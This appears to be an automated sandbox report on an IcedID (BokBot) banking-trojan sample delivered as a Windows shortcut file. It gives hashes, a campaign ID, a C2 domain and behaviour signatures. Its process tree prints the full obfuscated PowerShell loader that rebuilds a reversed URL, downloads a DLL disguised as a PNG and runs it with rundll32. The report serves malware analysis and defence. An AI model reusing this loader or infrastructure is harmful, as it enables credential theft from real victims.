Analysis

  • max time kernel
    130s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 15:48

General

  • Target

    doc_2265273.lnk

  • Size

    2KB

  • MD5

    a312e810fd34a9668948d6fa45982d25

  • SHA1

    a54e369404b7f2a1bc894116c4f9ee619cefe294

  • SHA256

    50518300d02153d04bf8eb8efd784fd88db56fbae142c1cfd5af45a52023d262

  • SHA512

    19dd647a3332b11440cce6ef2b129e09f3d280b997d8bc64449f2676f7dec5e8c260c494551a79faebc4b6e9c0bbfc955ea1d37018da013cd84266bcd9335fef

Malware Config

Extracted

Family

icedid

Campaign

227378761

C2

blionarywesta.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\doc_2265273.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s='/g54y5gcm548757vy/evres/dx/us.ssseniram//:ptth'; $r=$s[-1..-($s.Length)] -join ''; iwr -uri $r -o "c:\users\public\default.png";ru"ndll"32 c:\users\public\default.png,`#1
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4176
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" c:\users\public\default.png,#1
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:4908

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\default.png

    Filesize

    534KB

    MD5

    e73bd08a80f0dd8a1a8689b11646f27e

    SHA1

    76e2a4b1ca29d162802fb9a034cb99b4e30a31b3

    SHA256

    01028a8efcec87d9eafe0ce85b8e968e1df97562f2a5e612e5ff92436706684f

    SHA512

    6400582634591ff07fc4fc6dd87745d4528fb7cf6ca6524380a437ac6a20644e3d0f1bc86a367d33c17cabf2dd04a8f7fac05402aaf937807342cc421c9aaf15

  • \??\c:\users\public\default.png

    Filesize

    534KB

    MD5

    e73bd08a80f0dd8a1a8689b11646f27e

    SHA1

    76e2a4b1ca29d162802fb9a034cb99b4e30a31b3

    SHA256

    01028a8efcec87d9eafe0ce85b8e968e1df97562f2a5e612e5ff92436706684f

    SHA512

    6400582634591ff07fc4fc6dd87745d4528fb7cf6ca6524380a437ac6a20644e3d0f1bc86a367d33c17cabf2dd04a8f7fac05402aaf937807342cc421c9aaf15

  • memory/4176-130-0x0000000000000000-mapping.dmp

  • memory/4176-131-0x00000177AAA50000-0x00000177AAA72000-memory.dmp

    Filesize

    136KB

  • memory/4176-132-0x00007FFF18C50000-0x00007FFF19711000-memory.dmp

    Filesize

    10.8MB

  • memory/4176-136-0x00007FFF18C50000-0x00007FFF19711000-memory.dmp

    Filesize

    10.8MB

  • memory/4908-133-0x0000000000000000-mapping.dmp

  • memory/4908-137-0x0000000180000000-0x0000000180009000-memory.dmp

    Filesize

    36KB